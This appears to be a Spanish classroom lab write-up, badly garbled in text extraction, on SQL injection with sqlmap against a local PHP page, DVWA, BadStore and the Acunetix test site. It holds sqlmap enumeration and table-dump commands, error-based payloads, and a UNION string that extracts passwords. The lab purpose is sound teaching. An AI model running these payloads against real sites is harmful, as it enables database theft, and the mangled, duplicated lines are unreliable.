Академический Документы
Профессиональный Документы
Культура Документы
Injection 2
Map
Índice
1. Ataque Local...................................................................
................................................................................................
...........................................3
..............3
C) Tablas:..................................................................
...............................................................................................
......................................................6
.........................6
D) Columnas:................................................................
.............................................................................................
................................................7
...................7
E) Contenido de la Tabla:...................................................................
............................................................................................8
.........................8
2. DVWA ...................................................................
................................................................................................
....................................................
....................... 12
Installation
Installation..............................................................
....................................................................................................
............................................................
...................... 12
3. BadStore ...................................................................
................................................................................................
...............................................
.................. 17
B) Nombre de la BD..................................................................
...............................................................................................
..................................
..... 19
C) Tablas...............................................................
............................................................................................
.........................................................
............................ 20
D) Columnas .................................................................
..............................................................................................
..............................................
................. 21
4. Acunetix................................................................
.............................................................................................
....................................................
....................... 23
B) Nombre de la BD..................................................................
...............................................................................................
..................................
..... 25
C) Tablas...............................................................
............................................................................................
.........................................................
............................ 26
D) Columnas .................................................................
..............................................................................................
..............................................
................. 27
1.Ataque
1. Ataque Local
Vamos a realizar un ataque de SQL injection a nuestra página anterior con la cual hacíamos
una consulta a nuestra base de datos de MySQL.
A) Servidor de BD y Versión
Primero vamos a averiguar el tipo d e servidor de Base de Datos y su versión, para ello
utilizaremos la opción –b de sqlmap:
C:\sqlmap-0.9\sqlmap>sqlmap.py
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localho
http://localhost/ejerPHP/SQL_Injectio
st/ejerPHP/SQL_Injection/consult
n/consult
a.php?id=1 -b
sqlmap/0.9 - automatic
automatic SQL injection
injection and database takeover tool
http://sqlmap.sourceforge.net
[13:57:26] [INFO]
[INFO] using 'C:\sqlmap-0.9\s
'C:\sqlmap-0.9\sqlmap\
qlmap\output\
output\localhost\se
localhost\session'
ssion' as sessi
on file
[13:57:26] [INFO] testing connection to the target url
[13:57:26] [INFO] testing if the url is s table, wait a few seconds
[13:57:27] [INFO] url is stable
[13:57:27] [INFO] testing if GET parameter 'id' is dynamic
[13:57:27] [INFO] confirming that GET parameter 'id' is dynamic
[13:57:27] [INFO] GET parameter 'id' is dynamic
[13:57:28] [WARNING] heuristic test shows that GET parameter 'id' might not be i
njectable
[13:57:28] [INFO] testing sql injection
injection on GET parameter
parameter 'id'
[13:57:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:57:28] [INFO] GET parameter 'id' is 'AND boolean-based blind blind - WHERE or HAVI
NG clause' injectable
injectable
[13:57:28] [INFO] testing 'MySQL >= 5.0 AND error-based
error-based - WHERE or H AVING clause
'
[13:57:28] [INFO] testing 'PostgreSQL AND error-based
error-based - WHERE or HAVING clause'
[13:57:28] [INFO] testing 'Microsoft SQL Server/Sybase
Server/Sybase AND error-based
error-based - WHERE o
r HAVING clause'
clause'
[13:57:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[13:57:28] [INFO] testing 'MySQL > 5.0.11 stacke
s tacked
d queries'
[13:57:28] [INFO] testing 'PostgreSQL > 8 .1 stacked queries'
[13:57:28] [INFO]
[INFO] testing 'Microsoft SQL S erver/Sybase
erver/Sybase stacked queries'
[13:57:28] [INFO] testing 'MySQL > 5.0.11 AND time-based
time-based blind'
[13:57:38] [INFO] GET parameter 'id' is 'MySQL > 5.0.11
5 .0.11 AND time-based blind' in
jectable
[13:57:38] [INFO] testing 'MySQL UNION query (NULL)
(NULL) - 1 to 10
1 0 columns'
[13:57:38] [INFO] target url appears to be UNION injectable
injectable with 3 columns
[13:57:38] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 colu
mns' injectable
GET parameter
parameter 'id' is vulnerable.
vulnerable. Do you
y ou want to keep testing the others? [y/N]
Y
sqlmap identified
identified the following injection
injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind
blind - WHERE
WH ERE or HAVING clause
Payload: id=1 AND 6656=6656
En este paso el programa ha ido testeando cada una de las posibilidades para averiguar el tipo
de servidor:
[…]
B) Nombre de la BD
Éste es el primer paso para sacar toda la información que podamos de nuestra víctima ya que a
partir de aquí iremos pasa a paso entrando más a fondo en la BD.
C:\sqlmap-0.9\sqlmap>sqlmap.py
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localho
http://localhost/ejerPHP/SQL_Injectio
st/ejerPHP/SQL_Injection/consult
n/consult
a.php?id=1 --current-db
C:\sqlmap-0.9\sqlmap>sqlmap.py
C:\sqlmap-0.9\sqlmap>sqlm ap.py -u http://localho
http://localhost/ejerPHP/SQL_Injectio
st/ejerPHP/SQL_Injection/consult
n/consult
a.php?id=1 --tables -D asir1
D) Columnas:
C:\sqlmap-0.9\sqlmap>sqlmap.py
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localho
http://localhost/ejerPHP/SQL_Injectio
st/ejerPHP/SQL_Injection/consult
n/consult
a.php?id=1 --columns -T usuarios -D asir1
C:\sqlmap-0.9\sqlmap>sqlm
C:\sqlmap-0.9\sqlmap>sqlmap.py
ap.py -u http://localho
http://localhost/ejerPHP/SQL_Injectio
st/ejerPHP/SQL_Injection/consult
n/consult
a.php?id=1 --dump -T usuarios -D asir1
C:\sqlmap-0.9\sqlmap>sqlmap.py
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localho
http://localhost/ejerPHP/SQL_Injectio
st/ejerPHP/SQL_Injection/consult
n/consult
a.php?id=1 --dbs
C:\sqlmap-0.9\sqlmap>sqlmap.py
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localho
http://localhost/ejerPHP/SQL_Injectio
st/ejerPHP/SQL_Injection/consult
n/consult
a.php?id=1 --users
Estamos utilizando el usuario root que trae por defecto MySQL para acceder por PHP.
Si estamos utilizando el usuario root para nuestras sentencias de SQL eso quiere decir que
podemos hacer llamadas al sistema:
http://127.0.0.1/dvwa/
Comprobamos
Comprobamos la existencia de la vulnerabilidad:
1' or '1'='1' union select password, first_name from users where first_name='admin
http://es.scribd.com/doc/48652427/Practica-SQL-Injection-en-DVWA
3. BadStore
Si en el campo search escribimos una comilla doble (“) nos encontramos con una r espuesta del
servidor SQL, por lo que podemos prever la vulneravilidad SQL
A) Servidor de BD y Versión
C:\sqlmap-0.9\sqlmap>sqlm
C:\sqlmap-0.9\sqlmap>sqlmap.py
ap.py -u "http://192.168.13.164/cgi-bin/bads
"http://192.168.13.164/cgi-bin/badstore.cgi?se
tore.cgi?se
archquery=hi&action=search&x=
archquery=hi&action=search&x=0&y=0"
0&y=0" -b
B) Nombre de la BD
C:\sqlmap-0.9\sqlmap>sqlmap.py
C:\sqlmap-0.9\sqlmap>sqlm ap.py -u "http://192.168.13.164/cgi-bin/bads
"http://192.168.13.164/cgi-bin/badstore.cgi?se
tore.cgi?se
archquery=hi&action=search&x=
archquery=hi&action=search&x=0&y=0"
0&y=0" --current-db
El nombre de la BD es badstoredb
C) Tablas
C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/ba
C:\sqlmap-0.9\sqlmap>sqlmap.py "http://192.168.13.164/cgi-bin/badstore.cgi?se
dstore.cgi?se
archquery=hi&action=search&x=0&y=0"
archquery=hi&action=search&x=0&y=0" --tables -D badstoredb
Database: badstoredb
[1 table]
+--------+
| itemdb |
+--------+
D) Columnas
C:\sqlmap-0.9\sqlmap>sqlmap.py
C:\sqlmap-0.9\sqlmap>sqlm ap.py -u "http://192.168.13.164/cgi-bin/bads
"http://192.168.13.164/cgi-bin/badstore.cgi?se
tore.cgi?se
archquery=hi&action=search&x=
archquery=hi&action=search&x=0&y=0"
0&y=0" --columns -T itemdb -D badsto
badstoredb
redb
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
Database: badstoredb
Table: itemdb
[2 columns]
+--------+---------+
| Column | Type |
+--------+---------+
| price
price | numeric
numeric |
| qty | numeric |
+--------+---------+
C:\sqlmap-0.9\sqlmap>sqlmap.py
C:\sqlmap-0.9\sqlmap>sqlm ap.py -u "http://192.168.13.164/cgi-bin/bads
"http://192.168.13.164/cgi-bin/badstore.cgi?se
tore.cgi?se
archquery=hi&action=search&x=
archquery=hi&action=search&x=0&y=0"
0&y=0" --dbs
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
4. Acunetix
Entramos en la web y si damos unas vueltas por ella , en el apartado categories vemos que la
url nos aparece ?cat=1, es un indicio
in dicio para comprobar.
http://testphp.vulnweb.com/listproducts.php?cat=1
A) Servidor de BD y Versión
C:\sqlmap-0.9\sqlmap>sqlmap.py
C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://testphp.vulnw
http://testphp.vulnweb.com/listproducts.php?cat=1
eb.com/listproducts.php?cat=1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: cat=1 AND (SELECT
(S ELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10
7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F
LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
B) Nombre de la BD
C:\sqlmap-0.9\sqlmap>sqlmap.py - u http://testphp.vulnw
C:\sqlmap-0.9\sqlmap>sqlmap.py http://testphp.vulnweb.com/listproducts.php?ca
eb.com/listproducts.php?ca
t=1 --current-db
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: cat=1 AND (SELECT
(S ELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10
7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F
LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: cat=1 AND (SELECT
(S ELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10
7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F
LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
D) Columnas
C:\sqlmap-0.9\sqlmap>sqlmap.py - u http://testphp.vulnw
C:\sqlmap-0.9\sqlmap>sqlmap.py http://testphp.vulnweb.com/listproducts.php?ca
eb.com/listproducts.php?ca
t=1 --columns -T users -D acuart
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: cat=1 AND (SELECT
(S ELECT 997 FROM(SELECT COUNT(*),CONCAT(CHAR(58,109,99,10
7,58),(SELECT (CASE WHEN (997=997) THEN 1 ELSE 0 END)),CHAR(58,118,112,120,58),F
LOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)